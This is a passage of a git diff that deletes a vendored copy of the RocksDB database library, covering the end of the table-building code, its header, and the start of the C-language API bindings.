-      if (table_properties) {
-        *table_properties = tp;
-      }
-    }
-    delete builder;
-
-    // Finish and check for file errors
-    if (s.ok() && !empty) {
-      StopWatch sw(env, ioptions.statistics, TABLE_SYNC_MICROS);
-      s = file_writer->Sync(ioptions.use_fsync);
-    }
-    if (s.ok() && !empty) {
-      s = file_writer->Close();
-    }
-
-    if (s.ok() && !empty) {
-      // Verify that the table is usable
-      // We set for_compaction to false and don't OptimizeForCompactionTableRead
-      // here because this is a special case after we finish the table building
-      // No matter whether use_direct_io_for_flush_and_compaction is true,
-      // we will regrad this verification as user reads since the goal is
-      // to cache it here for further user reads
-      std::unique_ptr<InternalIterator> it(table_cache->NewIterator(
-          ReadOptions(), env_options, internal_comparator, meta->fd,
-          nullptr /* range_del_agg */, nullptr,
-          (internal_stats == nullptr) ? nullptr
-                                      : internal_stats->GetFileReadHist(0),
-          false /* for_compaction */, nullptr /* arena */,
-          false /* skip_filter */, level));
-      s = it->status();
-      if (s.ok() && paranoid_file_checks) {
-        for (it->SeekToFirst(); it->Valid(); it->Next()) {
-        }
-        s = it->status();
-      }
-    }
-  }
-
-  // Check for input iterator errors
-  if (!iter->status().ok()) {
-    s = iter->status();
-  }
-
-  if (!s.ok() || meta->fd.GetFileSize() == 0) {
-    env->DeleteFile(fname);
-  }
-
-  // Output to event logger and fire events.
-  EventHelpers::LogAndNotifyTableFileCreationFinished(
-      event_logger, ioptions.listeners, dbname, column_family_name, fname,
-      job_id, meta->fd, tp, reason, s);
-
-  return s;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/builder.h b/thirdparty/rocksdb/db/builder.h
deleted file mode 100644
index 5a5081c..0000000
--- a/thirdparty/rocksdb/db/builder.h
+++ /dev/null
@@ -1,83 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#pragma once
-#include <string>
-#include <utility>
-#include <vector>
-#include "db/table_properties_collector.h"
-#include "options/cf_options.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/env.h"
-#include "rocksdb/listener.h"
-#include "rocksdb/options.h"
-#include "rocksdb/status.h"
-#include "rocksdb/table_properties.h"
-#include "rocksdb/types.h"
-#include "table/scoped_arena_iterator.h"
-#include "util/event_logger.h"
-
-namespace rocksdb {
-
-struct Options;
-struct FileMetaData;
-
-class Env;
-struct EnvOptions;
-class Iterator;
-class TableCache;
-class VersionEdit;
-class TableBuilder;
-class WritableFileWriter;
-class InternalStats;
-class InternalIterator;
-
-// @param column_family_name Name of the column family that is also identified
-//    by column_family_id, or empty string if unknown. It must outlive the
-//    TableBuilder returned by this function.
-// @param compression_dict Data for presetting the compression library's
-//    dictionary, or nullptr.
-TableBuilder* NewTableBuilder(
-    const ImmutableCFOptions& options,
-    const InternalKeyComparator& internal_comparator,
-    const std::vector<std::unique_ptr<IntTblPropCollectorFactory>>*
-        int_tbl_prop_collector_factories,
-    uint32_t column_family_id, const std::string& column_family_name,
-    WritableFileWriter* file, const CompressionType compression_type,
-    const CompressionOptions& compression_opts, int level,
-    const std::string* compression_dict = nullptr,
-    const bool skip_filters = false, const uint64_t creation_time = 0,
-    const uint64_t oldest_key_time = 0);
-
-// Build a Table file from the contents of *iter.  The generated file
-// will be named according to number specified in meta. On success, the rest of
-// *meta will be filled with metadata about the generated table.
-// If no data is present in *iter, meta->file_size will be set to
-// zero, and no Table file will be produced.
-//
-// @param column_family_name Name of the column family that is also identified
-//    by column_family_id, or empty string if unknown.
-extern Status BuildTable(
-    const std::string& dbname, Env* env, const ImmutableCFOptions& options,
-    const MutableCFOptions& mutable_cf_options, const EnvOptions& env_options,
-    TableCache* table_cache, InternalIterator* iter,
-    std::unique_ptr<InternalIterator> range_del_iter, FileMetaData* meta,
-    const InternalKeyComparator& internal_comparator,
-    const std::vector<std::unique_ptr<IntTblPropCollectorFactory>>*
-        int_tbl_prop_collector_factories,
-    uint32_t column_family_id, const std::string& column_family_name,
-    std::vector<SequenceNumber> snapshots,
-    SequenceNumber earliest_write_conflict_snapshot,
-    const CompressionType compression,
-    const CompressionOptions& compression_opts, bool paranoid_file_checks,
-    InternalStats* internal_stats, TableFileCreationReason reason,
-    EventLogger* event_logger = nullptr, int job_id = 0,
-    const Env::IOPriority io_priority = Env::IO_HIGH,
-    TableProperties* table_properties = nullptr, int level = -1,
-    const uint64_t creation_time = 0, const uint64_t oldest_key_time = 0);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/c.cc b/thirdparty/rocksdb/db/c.cc
deleted file mode 100644
index cbfb855..0000000
--- a/thirdparty/rocksdb/db/c.cc
+++ /dev/null
@@ -1,3662 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/c.h"
-
-#include <stdlib.h>
-#include "port/port.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/convenience.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/filter_policy.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/options.h"
-#include "rocksdb/status.h"
-#include "rocksdb/write_batch.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/universal_compaction.h"
-#include "rocksdb/statistics.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/table.h"
-#include "rocksdb/rate_limiter.h"
-#include "rocksdb/utilities/backupable_db.h"
-#include "rocksdb/utilities/write_batch_with_index.h"
-#include "utilities/merge_operators.h"
-#include "rocksdb/utilities/transaction.h"
-#include "rocksdb/utilities/transaction_db.h"
-#include "rocksdb/utilities/optimistic_transaction_db.h"
-#include "rocksdb/utilities/checkpoint.h"
-
-using rocksdb::BytewiseComparator;
-using rocksdb::Cache;
-using rocksdb::ColumnFamilyDescriptor;
-using rocksdb::ColumnFamilyHandle;
-using rocksdb::ColumnFamilyOptions;
-using rocksdb::CompactionFilter;
-using rocksdb::CompactionFilterFactory;
-using rocksdb::CompactionFilterContext;
-using rocksdb::CompactionOptionsFIFO;
-using rocksdb::Comparator;
-using rocksdb::CompressionType;
-using rocksdb::WALRecoveryMode;
-using rocksdb::DB;
-using rocksdb::DBOptions;
-using rocksdb::DbPath;
-using rocksdb::Env;
-using rocksdb::EnvOptions;
-using rocksdb::InfoLogLevel;
-using rocksdb::FileLock;
-using rocksdb::FilterPolicy;
-using rocksdb::FlushOptions;
-using rocksdb::IngestExternalFileOptions;
-using rocksdb::Iterator;
-using rocksdb::Logger;
-using rocksdb::MergeOperator;
-using rocksdb::MergeOperators;
-using rocksdb::NewBloomFilterPolicy;
-using rocksdb::NewLRUCache;
-using rocksdb::Options;
-using rocksdb::BlockBasedTableOptions;
-using rocksdb::CuckooTableOptions;
-using rocksdb::RandomAccessFile;
-using rocksdb::Range;
-using rocksdb::ReadOptions;
-using rocksdb::SequentialFile;
-using rocksdb::Slice;
-using rocksdb::SliceParts;
-using rocksdb::SliceTransform;
-using rocksdb::Snapshot;
-using rocksdb::SstFileWriter;
-using rocksdb::Status;
-using rocksdb::WritableFile;
-using rocksdb::WriteBatch;
-using rocksdb::WriteBatchWithIndex;
-using rocksdb::WriteOptions;
-using rocksdb::LiveFileMetaData;
-using rocksdb::BackupEngine;
-using rocksdb::BackupableDBOptions;
-using rocksdb::BackupInfo;
-using rocksdb::RestoreOptions;
-using rocksdb::CompactRangeOptions;
-using rocksdb::RateLimiter;
-using rocksdb::NewGenericRateLimiter;
-using rocksdb::PinnableSlice;
-using rocksdb::TransactionDBOptions;
-using rocksdb::TransactionDB;
-using rocksdb::TransactionOptions;
-using rocksdb::OptimisticTransactionDB;
-using rocksdb::OptimisticTransactionOptions;
-using rocksdb::Transaction;
-using rocksdb::Checkpoint;
-
-using std::shared_ptr;
-
-extern "C" {
-
-struct rocksdb_t                 { DB*               rep; };
-struct rocksdb_backup_engine_t   { BackupEngine*     rep; };
-struct rocksdb_backup_engine_info_t { std::vector<BackupInfo> rep; };
-struct rocksdb_restore_options_t { RestoreOptions rep; };
-struct rocksdb_iterator_t        { Iterator*         rep; };
-struct rocksdb_writebatch_t      { WriteBatch        rep; };
-struct rocksdb_writebatch_wi_t   { WriteBatchWithIndex* rep; };
-struct rocksdb_snapshot_t        { const Snapshot*   rep; };
-struct rocksdb_flushoptions_t    { FlushOptions      rep; };
-struct rocksdb_fifo_compaction_options_t { CompactionOptionsFIFO rep; };
-struct rocksdb_readoptions_t {
-   ReadOptions rep;
-   Slice upper_bound; // stack variable to set pointer to in ReadOptions
-};
-struct rocksdb_writeoptions_t    { WriteOptions      rep; };
-struct rocksdb_options_t         { Options           rep; };
-struct rocksdb_compactoptions_t {
-  CompactRangeOptions rep;
-};
-struct rocksdb_block_based_table_options_t  { BlockBasedTableOptions rep; };
-struct rocksdb_cuckoo_table_options_t  { CuckooTableOptions rep; };
-struct rocksdb_seqfile_t         { SequentialFile*   rep; };
-struct rocksdb_randomfile_t      { RandomAccessFile* rep; };
-struct rocksdb_writablefile_t    { WritableFile*     rep; };
-struct rocksdb_filelock_t        { FileLock*         rep; };
-struct rocksdb_logger_t          { shared_ptr<Logger>  rep; };
-struct rocksdb_cache_t           { shared_ptr<Cache>   rep; };
-struct rocksdb_livefiles_t       { std::vector<LiveFileMetaData> rep; };
-struct rocksdb_column_family_handle_t  { ColumnFamilyHandle* rep; };
-struct rocksdb_envoptions_t      { EnvOptions        rep; };
-struct rocksdb_ingestexternalfileoptions_t  { IngestExternalFileOptions rep; };
-struct rocksdb_sstfilewriter_t   { SstFileWriter*    rep; };
-struct rocksdb_ratelimiter_t     { RateLimiter*      rep; };
-struct rocksdb_pinnableslice_t {
-  PinnableSlice rep;
-};
-struct rocksdb_transactiondb_options_t {
-  TransactionDBOptions rep;
-};
-struct rocksdb_transactiondb_t {
-  TransactionDB* rep;
-};
-struct rocksdb_transaction_options_t {
-  TransactionOptions rep;
-};
-struct rocksdb_transaction_t {
-  Transaction* rep;
-};
-struct rocksdb_checkpoint_t {
-  Checkpoint* rep;
-};
-struct rocksdb_optimistictransactiondb_t {
-  OptimisticTransactionDB* rep;
-};
-struct rocksdb_optimistictransaction_options_t {
-  OptimisticTransactionOptions rep;
-};
-
-struct rocksdb_compactionfiltercontext_t {
-  CompactionFilter::Context rep;
-};
-
-struct rocksdb_compactionfilter_t : public CompactionFilter {
-  void* state_;
-  void (*destructor_)(void*);
-  unsigned char (*filter_)(
-      void*,
-      int level,
-      const char* key, size_t key_length,
-      const char* existing_value, size_t value_length,
-      char** new_value, size_t *new_value_length,
-      unsigned char* value_changed);
-  const char* (*name_)(void*);
-  unsigned char ignore_snapshots_;
-
-  virtual ~rocksdb_compactionfilter_t() {
-    (*destructor_)(state_);
-  }
-
-  virtual bool Filter(int level, const Slice& key, const Slice& existing_value,
-                      std::string* new_value,
-                      bool* value_changed) const override {
-    char* c_new_value = nullptr;
-    size_t new_value_length = 0;
-    unsigned char c_value_changed = 0;
-    unsigned char result = (*filter_)(
-        state_,
-        level,
-        key.data(), key.size(),
-        existing_value.data(), existing_value.size(),
-        &c_new_value, &new_value_length, &c_value_changed);
-    if (c_value_changed) {
-      new_value->assign(c_new_value, new_value_length);
-      *value_changed = true;
-    }
-    return result;
-  }
-
-  virtual const char* Name() const override { return (*name_)(state_); }
-
-  virtual bool IgnoreSnapshots() const override { return ignore_snapshots_; }
-};
-
-struct rocksdb_compactionfilterfactory_t : public CompactionFilterFactory {
-  void* state_;
-  void (*destructor_)(void*);
-  rocksdb_compactionfilter_t* (*create_compaction_filter_)(
-      void*, rocksdb_compactionfiltercontext_t* context);
-  const char* (*name_)(void*);
-
-  virtual ~rocksdb_compactionfilterfactory_t() { (*destructor_)(state_); }
-
-  virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override {
-    rocksdb_compactionfiltercontext_t ccontext;
-    ccontext.rep = context;
-    CompactionFilter* cf = (*create_compaction_filter_)(state_, &ccontext);
-    return std::unique_ptr<CompactionFilter>(cf);
-  }
-
-  virtual const char* Name() const override { return (*name_)(state_); }
-};
-
-struct rocksdb_comparator_t : public Comparator {
-  void* state_;
-  void (*destructor_)(void*);
-  int (*compare_)(
-      void*,
-      const char* a, size_t alen,
-      const char* b, size_t blen);
-  const char* (*name_)(void*);
-
-  virtual ~rocksdb_comparator_t() {
-    (*destructor_)(state_);
-  }
-
-  virtual int Compare(const Slice& a, const Slice& b) const override {
-    return (*compare_)(state_, a.data(), a.size(), b.data(), b.size());
-  }
-
-  virtual const char* Name() const override { return (*name_)(state_); }
-
-  // No-ops since the C binding does not support key shortening methods.
-  virtual void FindShortestSeparator(std::string*,
-                                     const Slice&) const override {}
-  virtual void FindShortSuccessor(std::string* key) const override {}
-};
-
-struct rocksdb_filterpolicy_t : public FilterPolicy {
-  void* state_;
-  void (*destructor_)(void*);
-  const char* (*name_)(void*);
-  char* (*create_)(
-      void*,
-      const char* const* key_array, const size_t* key_length_array,
-      int num_keys,
-      size_t* filter_length);
-  unsigned char (*key_match_)(
-      void*,
-      const char* key, size_t length,
-      const char* filter, size_t filter_length);
-  void (*delete_filter_)(
-      void*,
-      const char* filter, size_t filter_length);
-
-  virtual ~rocksdb_filterpolicy_t() {
-    (*destructor_)(state_);
-  }
-
-  virtual const char* Name() const override { return (*name_)(state_); }
-
-  virtual void CreateFilter(const Slice* keys, int n,
-                            std::string* dst) const override {
-    std::vector<const char*> key_pointers(n);
-    std::vector<size_t> key_sizes(n);
-    for (int i = 0; i < n; i++) {
-      key_pointers[i] = keys[i].data();
-      key_sizes[i] = keys[i].size();
-    }
-    size_t len;
-    char* filter = (*create_)(state_, &key_pointers[0], &key_sizes[0], n, &len);
-    dst->append(filter, len);
-
-    if (delete_filter_ != nullptr) {
-      (*delete_filter_)(state_, filter, len);
-    } else {
-      free(filter);
-    }
-  }
-
-  virtual bool KeyMayMatch(const Slice& key,
-                           const Slice& filter) const override {
-    return (*key_match_)(state_, key.data(), key.size(),
-                         filter.data(), filter.size());
-  }
-};
-
-struct rocksdb_mergeoperator_t : public MergeOperator {
-  void* state_;
-  void (*destructor_)(void*);
-  const char* (*name_)(void*);
-  char* (*full_merge_)(
-      void*,
-      const char* key, size_t key_length,
-      const char* existing_value, size_t existing_value_length,
-      const char* const* operands_list, const size_t* operands_list_length,
-      int num_operands,
-      unsigned char* success, size_t* new_value_length);
-  char* (*partial_merge_)(void*, const char* key, size_t key_length,
-                          const char* const* operands_list,
-                          const size_t* operands_list_length, int num_operands,
-                          unsigned char* success, size_t* new_value_length);
-  void (*delete_value_)(
-      void*,
-      const char* value, size_t value_length);
-
-  virtual ~rocksdb_mergeoperator_t() {
-    (*destructor_)(state_);
-  }
-
-  virtual const char* Name() const override { return (*name_)(state_); }
-
-  virtual bool FullMergeV2(const MergeOperationInput& merge_in,
-                           MergeOperationOutput* merge_out) const override {
-    size_t n = merge_in.operand_list.size();
-    std::vector<const char*> operand_pointers(n);
-    std::vector<size_t> operand_sizes(n);
-    for (size_t i = 0; i < n; i++) {
-      Slice operand(merge_in.operand_list[i]);
-      operand_pointers[i] = operand.data();
-      operand_sizes[i] = operand.size();
-    }
-
-    const char* existing_value_data = nullptr;
-    size_t existing_value_len = 0;
-    if (merge_in.existing_value != nullptr) {
-      existing_value_data = merge_in.existing_value->data();
-      existing_value_len = merge_in.existing_value->size();
-    }
-
-    unsigned char success;
-    size_t new_value_len;
-    char* tmp_new_value = (*full_merge_)(
-        state_, merge_in.key.data(), merge_in.key.size(), existing_value_data,
-        existing_value_len, &operand_pointers[0], &operand_sizes[0],
-        static_cast<int>(n), &success, &new_value_len);
-    merge_out->new_value.assign(tmp_new_value, new_value_len);
-
-    if (delete_value_ != nullptr) {
-      (*delete_value_)(state_, tmp_new_value, new_value_len);
-    } else {
-      free(tmp_new_value);
-    }
-
-    return success;
-  }
-
-  virtual bool PartialMergeMulti(const Slice& key,
-                                 const std::deque<Slice>& operand_list,
-                                 std::string* new_value,
-                                 Logger* logger) const override {
-    size_t operand_count = operand_list.size();
-    std::vector<const char*> operand_pointers(operand_count);
-    std::vector<size_t> operand_sizes(operand_count);
-    for (size_t i = 0; i < operand_count; ++i) {
-      Slice operand(operand_list[i]);
-      operand_pointers[i] = operand.data();
-      operand_sizes[i] = operand.size();
-    }
-
-    unsigned char success;
-    size_t new_value_len;
-    char* tmp_new_value = (*partial_merge_)(
-        state_, key.data(), key.size(), &operand_pointers[0], &operand_sizes[0],
-        static_cast<int>(operand_count), &success, &new_value_len);
-    new_value->assign(tmp_new_value, new_value_len);
-
-    if (delete_value_ != nullptr) {
-      (*delete_value_)(state_, tmp_new_value, new_value_len);
-    } else {
-      free(tmp_new_value);
-    }
-
-    return success;
-  }
-};
-
-struct rocksdb_dbpath_t {
-  DbPath rep;
-};
-
-struct rocksdb_env_t {
-  Env* rep;
-  bool is_default;
-};
-
-struct rocksdb_slicetransform_t : public SliceTransform {
-  void* state_;
-  void (*destructor_)(void*);
-  const char* (*name_)(void*);
-  char* (*transform_)(
-      void*,
-      const char* key, size_t length,
-      size_t* dst_length);
-  unsigned char (*in_domain_)(
-      void*,
-      const char* key, size_t length);
-  unsigned char (*in_range_)(
-      void*,
-      const char* key, size_t length);
-
-  virtual ~rocksdb_slicetransform_t() {
-    (*destructor_)(state_);
-  }
-
-  virtual const char* Name() const override { return (*name_)(state_); }
-
-  virtual Slice Transform(const Slice& src) const override {
-    size_t len;
-    char* dst = (*transform_)(state_, src.data(), src.size(), &len);
-    return Slice(dst, len);
-  }
-
-  virtual bool InDomain(const Slice& src) const override {
-    return (*in_domain_)(state_, src.data(), src.size());
-  }
-
-  virtual bool InRange(const Slice& src) const override {
-    return (*in_range_)(state_, src.data(), src.size());
-  }
-};
-
-struct rocksdb_universal_compaction_options_t {
-  rocksdb::CompactionOptionsUniversal *rep;
-};
-
-static bool SaveError(char** errptr, const Status& s) {
-  assert(errptr != nullptr);
-  if (s.ok()) {
-    return false;
-  } else if (*errptr == nullptr) {
-    *errptr = strdup(s.ToString().c_str());
-  } else {
-    // TODO(sanjay): Merge with existing error?
-    // This is a bug if *errptr is not created by malloc()
-    free(*errptr);
-    *errptr = strdup(s.ToString().c_str());
-  }
-  return true;
-}
-
-static char* CopyString(const std::string& str) {
-  char* result = reinterpret_cast<char*>(malloc(sizeof(char) * str.size()));
-  memcpy(result, str.data(), sizeof(char) * str.size());
-  return result;
-}
-
-rocksdb_t* rocksdb_open(
-    const rocksdb_options_t* options,
-    const char* name,
-    char** errptr) {
-  DB* db;
-  if (SaveError(errptr, DB::Open(options->rep, std::string(name), &db))) {
-    return nullptr;
-  }
-  rocksdb_t* result = new rocksdb_t;
-  result->rep = db;
-  return result;
-}
-
-rocksdb_t* rocksdb_open_for_read_only(
-    const rocksdb_options_t* options,
-    const char* name,
-    unsigned char error_if_log_file_exist,
-    char** errptr) {
-  DB* db;
-  if (SaveError(errptr, DB::OpenForReadOnly(options->rep, std::string(name), &db, error_if_log_file_exist))) {
-    return nullptr;
-  }
-  rocksdb_t* result = new rocksdb_t;
-  result->rep = db;
-  return result;
-}
-
-rocksdb_backup_engine_t* rocksdb_backup_engine_open(
-    const rocksdb_options_t* options, const char* path, char** errptr) {
-  BackupEngine* be;
-  if (SaveError(errptr, BackupEngine::Open(options->rep.env,
-                                           BackupableDBOptions(path,
-                                                               nullptr,
-                                                               true,
-                                                               options->rep.info_log.get()),
-                                           &be))) {
-    return nullptr;
-  }
-  rocksdb_backup_engine_t* result = new rocksdb_backup_engine_t;
-  result->rep = be;
-  return result;
-}
-
-void rocksdb_backup_engine_create_new_backup(rocksdb_backup_engine_t* be,
-                                             rocksdb_t* db, char** errptr) {
-  SaveError(errptr, be->rep->CreateNewBackup(db->rep));
-}
-
-void rocksdb_backup_engine_purge_old_backups(rocksdb_backup_engine_t* be,
-                                             uint32_t num_backups_to_keep,
-                                             char** errptr) {
-  SaveError(errptr, be->rep->PurgeOldBackups(num_backups_to_keep));
-}
-
-rocksdb_restore_options_t* rocksdb_restore_options_create() {
-  return new rocksdb_restore_options_t;
-}
-
-void rocksdb_restore_options_destroy(rocksdb_restore_options_t* opt) {
-  delete opt;
-}
-
-void rocksdb_restore_options_set_keep_log_files(rocksdb_restore_options_t* opt,
-                                                int v) {
-  opt->rep.keep_log_files = v;
-}
-
-void rocksdb_backup_engine_restore_db_from_latest_backup(
-    rocksdb_backup_engine_t* be, const char* db_dir, const char* wal_dir,
-    const rocksdb_restore_options_t* restore_options, char** errptr) {
-  SaveError(errptr, be->rep->RestoreDBFromLatestBackup(std::string(db_dir),
-                                                       std::string(wal_dir),
-                                                       restore_options->rep));
-}
-
-const rocksdb_backup_engine_info_t* rocksdb_backup_engine_get_backup_info(
-    rocksdb_backup_engine_t* be) {
-  rocksdb_backup_engine_info_t* result = new rocksdb_backup_engine_info_t;
-  be->rep->GetBackupInfo(&result->rep);
-  return result;
-}
-
-int rocksdb_backup_engine_info_count(const rocksdb_backup_engine_info_t* info) {
-  return static_cast<int>(info->rep.size());
-}
-
-int64_t rocksdb_backup_engine_info_timestamp(
-    const rocksdb_backup_engine_info_t* info, int index) {
-  return info->rep[index].timestamp;
-}
-
-uint32_t rocksdb_backup_engine_info_backup_id(
-    const rocksdb_backup_engine_info_t* info, int index) {
-  return info->rep[index].backup_id;
-}
-
-uint64_t rocksdb_backup_engine_info_size(
-    const rocksdb_backup_engine_info_t* info, int index) {
-  return info->rep[index].size;
-}
-
-uint32_t rocksdb_backup_engine_info_number_files(
-    const rocksdb_backup_engine_info_t* info, int index) {
-  return info->rep[index].number_files;
-}
-
-void rocksdb_backup_engine_info_destroy(
-    const rocksdb_backup_engine_info_t* info) {
-  delete info;
-}
-
-void rocksdb_backup_engine_close(rocksdb_backup_engine_t* be) {
-  delete be->rep;
-  delete be;
-}
-
-rocksdb_checkpoint_t* rocksdb_checkpoint_object_create(rocksdb_t* db,
-                                                       char** errptr) {
-  Checkpoint* checkpoint;
-  if (SaveError(errptr, Checkpoint::Create(db->rep, &checkpoint))) {
-    return nullptr;
-  }
-  rocksdb_checkpoint_t* result = new rocksdb_checkpoint_t;
-  result->rep = checkpoint;
-  return result;
-}
-
-void rocksdb_checkpoint_create(rocksdb_checkpoint_t* checkpoint,
-                               const char* checkpoint_dir,
-                               uint64_t log_size_for_flush, char** errptr) {
-  SaveError(errptr, checkpoint->rep->CreateCheckpoint(
-                        std::string(checkpoint_dir), log_size_for_flush));
-}
-
-void rocksdb_checkpoint_object_destroy(rocksdb_checkpoint_t* checkpoint) {
-  delete checkpoint->rep;
-  delete checkpoint;
-}
-
-void rocksdb_close(rocksdb_t* db) {
-  delete db->rep;
-  delete db;
-}
-
-void rocksdb_options_set_uint64add_merge_operator(rocksdb_options_t* opt) {
-  opt->rep.merge_operator = rocksdb::MergeOperators::CreateUInt64AddOperator();
-}
-
-rocksdb_t* rocksdb_open_column_families(
-    const rocksdb_options_t* db_options,
-    const char* name,
-    int num_column_families,
-    const char** column_family_names,
-    const rocksdb_options_t** column_family_options,
-    rocksdb_column_family_handle_t** column_family_handles,
-    char** errptr) {
-  std::vector<ColumnFamilyDescriptor> column_families;
-  for (int i = 0; i < num_column_families; i++) {
-    column_families.push_back(ColumnFamilyDescriptor(
-        std::string(column_family_names[i]),
-        ColumnFamilyOptions(column_family_options[i]->rep)));
-  }
-
-  DB* db;
-  std::vector<ColumnFamilyHandle*> handles;
-  if (SaveError(errptr, DB::Open(DBOptions(db_options->rep),
-          std::string(name), column_families, &handles, &db))) {
-    return nullptr;
-  }
-
-  for (size_t i = 0; i < handles.size(); i++) {
-    rocksdb_column_family_handle_t* c_handle = new rocksdb_column_family_handle_t;
-    c_handle->rep = handles[i];
-    column_family_handles[i] = c_handle;
-  }
-  rocksdb_t* result = new rocksdb_t;
-  result->rep = db;
-  return result;
-}
-
-rocksdb_t* rocksdb_open_for_read_only_column_families(
-    const rocksdb_options_t* db_options,
-    const char* name,
-    int num_column_families,
-    const char** column_family_names,
-    const rocksdb_options_t** column_family_options,
-    rocksdb_column_family_handle_t** column_family_handles,
-    unsigned char error_if_log_file_exist,
-    char** errptr) {
-  std::vector<ColumnFamilyDescriptor> column_families;
-  for (int i = 0; i < num_column_families; i++) {
-    column_families.push_back(ColumnFamilyDescriptor(
-        std::string(column_family_names[i]),
-        ColumnFamilyOptions(column_family_options[i]->rep)));
-  }
-
-  DB* db;
-  std::vector<ColumnFamilyHandle*> handles;
-  if (SaveError(errptr, DB::OpenForReadOnly(DBOptions(db_options->rep),
-          std::string(name), column_families, &handles, &db, error_if_log_file_exist))) {
-    return nullptr;
-  }
-
-  for (size_t i = 0; i < handles.size(); i++) {
-    rocksdb_column_family_handle_t* c_handle = new rocksdb_column_family_handle_t;
-    c_handle->rep = handles[i];
-    column_family_handles[i] = c_handle;
-  }
-  rocksdb_t* result = new rocksdb_t;
-  result->rep = db;
-  return result;
-}
-
-char** rocksdb_list_column_families(
-    const rocksdb_options_t* options,
-    const char* name,
-    size_t* lencfs,
-    char** errptr) {
-  std::vector<std::string> fams;
-  SaveError(errptr,
-      DB::ListColumnFamilies(DBOptions(options->rep),
-        std::string(name), &fams));
-
-  *lencfs = fams.size();
-  char** column_families = static_cast<char**>(malloc(sizeof(char*) * fams.size()));
-  for (size_t i = 0; i < fams.size(); i++) {
-    column_families[i] = strdup(fams[i].c_str());
-  }
-  return column_families;
-}
-
-void rocksdb_list_column_families_destroy(char** list, size_t len) {
-  for (size_t i = 0; i < len; ++i) {
-    free(list[i]);
-  }
-  free(list);
-}
-
-rocksdb_column_family_handle_t* rocksdb_create_column_family(
-    rocksdb_t* db,
-    const rocksdb_options_t* column_family_options,
-    const char* column_family_name,
-    char** errptr) {
-  rocksdb_column_family_handle_t* handle = new rocksdb_column_family_handle_t;
-  SaveError(errptr,
-      db->rep->CreateColumnFamily(ColumnFamilyOptions(column_family_options->rep),
-        std::string(column_family_name), &(handle->rep)));
-  return handle;
-}
-
-void rocksdb_drop_column_family(
-    rocksdb_t* db,
-    rocksdb_column_family_handle_t* handle,
-    char** errptr) {
-  SaveError(errptr, db->rep->DropColumnFamily(handle->rep));
-}
-
-void rocksdb_column_family_handle_destroy(rocksdb_column_family_handle_t* handle) {
-  delete handle->rep;
-  delete handle;
-}
-
-void rocksdb_put(
-    rocksdb_t* db,
-    const rocksdb_writeoptions_t* options,
-    const char* key, size_t keylen,
-    const char* val, size_t vallen,
-    char** errptr) {
-  SaveError(errptr,
-            db->rep->Put(options->rep, Slice(key, keylen), Slice(val, vallen)));
-}
-
-void rocksdb_put_cf(
-    rocksdb_t* db,
-    const rocksdb_writeoptions_t* options,
-    rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t keylen,
-    const char* val, size_t vallen,
-    char** errptr) {
-  SaveError(errptr,
-            db->rep->Put(options->rep, column_family->rep,
-              Slice(key, keylen), Slice(val, vallen)));
-}
-
-void rocksdb_delete(
-    rocksdb_t* db,
-    const rocksdb_writeoptions_t* options,
-    const char* key, size_t keylen,
-    char** errptr) {
-  SaveError(errptr, db->rep->Delete(options->rep, Slice(key, keylen)));
-}
-
-void rocksdb_delete_cf(
-    rocksdb_t* db,
-    const rocksdb_writeoptions_t* options,
-    rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t keylen,
-    char** errptr) {
-  SaveError(errptr, db->rep->Delete(options->rep, column_family->rep,
-        Slice(key, keylen)));
-}
-
-void rocksdb_merge(
-    rocksdb_t* db,
-    const rocksdb_writeoptions_t* options,
-    const char* key, size_t keylen,
-    const char* val, size_t vallen,
-    char** errptr) {
-  SaveError(errptr,
-            db->rep->Merge(options->rep, Slice(key, keylen), Slice(val, vallen)));
-}
-
-void rocksdb_merge_cf(
-    rocksdb_t* db,
-    const rocksdb_writeoptions_t* options,
-    rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t keylen,
-    const char* val, size_t vallen,
-    char** errptr) {
-  SaveError(errptr,
-            db->rep->Merge(options->rep, column_family->rep,
-              Slice(key, keylen), Slice(val, vallen)));
-}
-
-void rocksdb_write(
-    rocksdb_t* db,
-    const rocksdb_writeoptions_t* options,
-    rocksdb_writebatch_t* batch,
-    char** errptr) {
-  SaveError(errptr, db->rep->Write(options->rep, &batch->rep));
-}
-
-char* rocksdb_get(
-    rocksdb_t* db,
-    const rocksdb_readoptions_t* options,
-    const char* key, size_t keylen,
-    size_t* vallen,
-    char** errptr) {
-  char* result = nullptr;
-  std::string tmp;
-  Status s = db->rep->Get(options->rep, Slice(key, keylen), &tmp);
-  if (s.ok()) {
-    *vallen = tmp.size();
-    result = CopyString(tmp);
-  } else {
-    *vallen = 0;
-    if (!s.IsNotFound()) {
-      SaveError(errptr, s);
-    }
-  }
-  return result;
-}
-
-char* rocksdb_get_cf(
-    rocksdb_t* db,
-    const rocksdb_readoptions_t* options,
-    rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t keylen,
-    size_t* vallen,
-    char** errptr) {
-  char* result = nullptr;
-  std::string tmp;
-  Status s = db->rep->Get(options->rep, column_family->rep,
